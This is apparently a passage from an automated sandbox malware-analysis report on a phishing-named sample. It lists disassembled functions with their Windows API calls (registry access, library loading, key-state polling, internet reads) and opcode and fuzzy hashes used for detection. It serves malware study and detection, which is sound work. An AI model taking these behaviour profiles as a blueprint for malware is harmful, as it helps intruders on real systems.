                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4BD4B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286116820-0
                                                                                                                    • Opcode ID: 93ee9bc46de14d1e246d79f715937e054129db4bd33b8ee58b176cc485b541b0
                                                                                                                    • Instruction ID: ee7a89c0fabfa5be03b214e1be265d3d690f513edcb723dbcdb2fa4a350639dc
                                                                                                                    • Opcode Fuzzy Hash: 93ee9bc46de14d1e246d79f715937e054129db4bd33b8ee58b176cc485b541b0
                                                                                                                    • Instruction Fuzzy Hash: B851B771D04209AFDB14DF669CC19AEBFB8FF41320B10426AEA54D7192EB34DE41BB90
                                                                                                                    Function 00F7E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7CF22,?), ref: 00F7DDFD
                                                                                                                      • Part of subcall function 00F7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7CF22,?), ref: 00F7DE16
                                                                                                                      • Part of subcall function 00F7E199: GetFileAttributesW.KERNEL32(?,00F7CF95), ref: 00F7E19A
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F7E473
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00F7E4AC
                                                                                                                    • _wcslen.LIBCMT ref: 00F7E5EB
                                                                                                                    • _wcslen.LIBCMT ref: 00F7E603
                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F7E650
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3183298772-0
                                                                                                                    • Opcode ID: c247f67206c1c9bf041d30746d1caa81e4811fef2ccebcb11a3686a4f025ecab
                                                                                                                    • Instruction ID: f0228a570fbe5e6917cea122c957e7ebed187c7daac9480866e804a4f2f6833e
                                                                                                                    • Opcode Fuzzy Hash: c247f67206c1c9bf041d30746d1caa81e4811fef2ccebcb11a3686a4f025ecab
                                                                                                                    • Instruction Fuzzy Hash: A45182B24083455BC724DBA0DC819DB73ECAF89350F40495FF689D3151EF78A68897A7
                                                                                                                    Function 00F9B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9BAA5
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9BB00
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F9BB63
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F9BBA6
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9BBB3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 826366716-0
                                                                                                                    • Opcode ID: 667b21b63dbe9f4ea444b7b118d62f1da1c31fbb2c342286598ce1cb0317b978
                                                                                                                    • Instruction ID: 3ba1510d97d4a93acb2b7bd66584dab5661794d397a29b5c8db884535c0632e0
                                                                                                                    • Opcode Fuzzy Hash: 667b21b63dbe9f4ea444b7b118d62f1da1c31fbb2c342286598ce1cb0317b978
                                                                                                                    • Instruction Fuzzy Hash: 93610331208201EFD714DF14C990E6ABBE5FF84318F54855CF4998B2A2CB35ED45EB92
                                                                                                                    Function 00F78BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F78BCD
                                                                                                                    • VariantClear.OLEAUT32 ref: 00F78C3E
                                                                                                                    • VariantClear.OLEAUT32 ref: 00F78C9D
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F78D10
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F78D3B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4136290138-0
                                                                                                                    • Opcode ID: 7258c0001794f6ef9a1bce8014884e5fb29675c947862ca625af0e134cb53dfa
                                                                                                                    • Instruction ID: b80a6096ec71ec63efff95841d39dc9a57775f1b230c49e18cf4b2a489bc8854
                                                                                                                    • Opcode Fuzzy Hash: 7258c0001794f6ef9a1bce8014884e5fb29675c947862ca625af0e134cb53dfa
                                                                                                                    • Instruction Fuzzy Hash: 13515CB5A00219EFCB14CF58C894AAAB7F8FF8D350B15855AE909DB350E730E912CF90
                                                                                                                    Function 00F88AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F88BAE
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F88BDA
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F88C32
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F88C57
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F88C5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: dd2970dfc1ee20f703a81dd6b9ef84b204deafd1b8a44ca4324029adf278d168
                                                                                                                    • Instruction ID: 0b4515366b7a140421ee5182fd63271009eeda2b0e3512ceda61e30a5101ce95
                                                                                                                    • Opcode Fuzzy Hash: dd2970dfc1ee20f703a81dd6b9ef84b204deafd1b8a44ca4324029adf278d168
                                                                                                                    • Instruction Fuzzy Hash: E1514C35A002199FCB05EF64C881AADBBF5FF49314F088458E849AB362DB35ED51EB90
                                                                                                                    Function 00F98EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F98F40
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F98FD0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F98FEC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F99032
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F99052
                                                                                                                      • Part of subcall function 00F2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F81043,?,761DE610), ref: 00F2F6E6
                                                                                                                      • Part of subcall function 00F2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F6FA64,00000000,00000000,?,?,00F81043,?,761DE610,?,00F6FA64), ref: 00F2F70D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 666041331-0
                                                                                                                    • Opcode ID: 686d0966f9acac9c72bdd1aaaa2182bc5502bc02588e27fafb8586f31f4974a4
                                                                                                                    • Instruction ID: 3313db446366584ca3b47eeffaad73f60e866fbd4676b1fbb5bfbee6241dec4a
                                                                                                                    • Opcode Fuzzy Hash: 686d0966f9acac9c72bdd1aaaa2182bc5502bc02588e27fafb8586f31f4974a4
                                                                                                                    • Instruction Fuzzy Hash: E4517E35A04205DFDB04DF68C4949ADBBF1FF49324F098098E8169B362DB35ED86EB90
                                                                                                                    Function 00FA6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FA6C33
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00FA6C4A
                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FA6C73
                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F8AB79,00000000,00000000), ref: 00FA6C98
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FA6CC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3688381893-0
                                                                                                                    • Opcode ID: 7b0fde73949a813cc12e9048f274a942489635dcf65d2c8532b34c4317e13134
                                                                                                                    • Instruction ID: 4a98de6547877b313be1c0d044f8e8edab37c3a6fda8f13159b9b8e42679355c
                                                                                                                    • Opcode Fuzzy Hash: 7b0fde73949a813cc12e9048f274a942489635dcf65d2c8532b34c4317e13134
                                                                                                                    • Instruction Fuzzy Hash: 1541B3B5A04104AFD724DF28CC54FA97BA5EB4B371F190228F899E73E1C771AD41EA90
                                                                                                                    Function 00F42051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: e90b4c5450ba9fca056c180131fb1adb18f949755dcc60ceab6c5c4b678f5322
                                                                                                                    • Instruction ID: 949b84ccbfb469b3f0ed13d846292349a6fa70420d07fdab38fa0299f1efc3f0
                                                                                                                    • Opcode Fuzzy Hash: e90b4c5450ba9fca056c180131fb1adb18f949755dcc60ceab6c5c4b678f5322
                                                                                                                    • Instruction Fuzzy Hash: 7C41CF32E002049BCB20DF78C880A5EBBF5EF88720F5545B9F915EB356DA31AD01EB80
                                                                                                                    Function 00F2912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00F29141
                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00F2915E
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00F29183
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00F2919D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: c54ae6fedf47dd71d28d97f74801bd10680afdbcce07c4ca5f7455a62442829b
                                                                                                                    • Instruction ID: d1f832c04f5ea1d067020f69b7517d3ac56fa7464b02ac55716350fc2c3d8cdb
                                                                                                                    • Opcode Fuzzy Hash: c54ae6fedf47dd71d28d97f74801bd10680afdbcce07c4ca5f7455a62442829b
                                                                                                                    • Instruction Fuzzy Hash: 22416071A0861ABBDF15AF69D844BEEB774FB06334F204216E429A32D0C7746950EF91
                                                                                                                    Function 00F83874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetInputState.USER32 ref: 00F838CB
                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F83922
                                                                                                                    • TranslateMessage.USER32(?), ref: 00F8394B
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00F83955
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F83966
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2256411358-0
                                                                                                                    • Opcode ID: 81b44b6f4f1d8f5e430c0c0a0cc7de65d74bcef42fe7e199b870119217987b39
                                                                                                                    • Instruction ID: d622f3cc50b63c73b271d05c017ae446d4f7333896912d891ac6d8afd310c50c
                                                                                                                    • Opcode Fuzzy Hash: 81b44b6f4f1d8f5e430c0c0a0cc7de65d74bcef42fe7e199b870119217987b39
                                                                                                                    • Instruction Fuzzy Hash: E631E571D043899EEB35EB35DC88BF637A9EB05B10F04056DE466860B0E7F4AA85FB11
                                                                                                                    Function 00F8CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CF38
                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00F8CF6F
                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFB4
                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFC8
                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8C21E,00000000), ref: 00F8CFF2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3191363074-0
                                                                                                                    • Opcode ID: 39fd04e73c5ba3cc13062348df38ba248550f906e783bb9f706395ff136bd881
                                                                                                                    • Instruction ID: 548d1dbe377123704a8411f47e8144a08ac2a23d3c1c6ad482403b65f1ef4619
                                                                                                                    • Opcode Fuzzy Hash: 39fd04e73c5ba3cc13062348df38ba248550f906e783bb9f706395ff136bd881
                                                                                                                    • Instruction Fuzzy Hash: 703150B1904205EFEB20EFA5D884AABBBF9EF15354B10442EF616D2140DB34AD45EBB0
                                                                                                                    Function 00F71901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F71915
                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F719C1
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00F719C9
                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F719DA
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F719E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 80c336edc8980b731f77da87044fa76230072befd0fb8b78124e8113e84965ab
                                                                                                                    • Instruction ID: bcfb8134c6e06e463f76445e7a0f9dee151ca9cc69270981d7245a49ca3e27e6
                                                                                                                    • Opcode Fuzzy Hash: 80c336edc8980b731f77da87044fa76230072befd0fb8b78124e8113e84965ab
                                                                                                                    • Instruction Fuzzy Hash: A231C171A00219EFCB10CFACCD58ADE3BB5FB05324F008226FA25A72D1C3709959EB91
                                                                                                                    Function 00FA5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FA5745
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FA579D
                                                                                                                    • _wcslen.LIBCMT ref: 00FA57AF
                                                                                                                    • _wcslen.LIBCMT ref: 00FA57BA
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA5816
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 763830540-0
                                                                                                                    • Opcode ID: 3f157750d41b12af5d864cfe9a07a849c1ba192d6529c9016715ba975d796eab
                                                                                                                    • Instruction ID: 137cdc5c9156619572a6f8f258312bc2f6cb843d5848bf5b7c96d8c832c72de8
                                                                                                                    • Opcode Fuzzy Hash: 3f157750d41b12af5d864cfe9a07a849c1ba192d6529c9016715ba975d796eab
                                                                                                                    • Instruction Fuzzy Hash: AC2185B5D04618DADB20DFA0CC85AEE77B8FF06B34F108216F919EA180D7749985EF91
                                                                                                                    Function 00F90930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 00F90951
                                                                                                                    • GetForegroundWindow.USER32 ref: 00F90968
                                                                                                                    • GetDC.USER32(00000000), ref: 00F909A4
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00F909B0
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00F909E8
                                                                                                                    Memory Dump Source
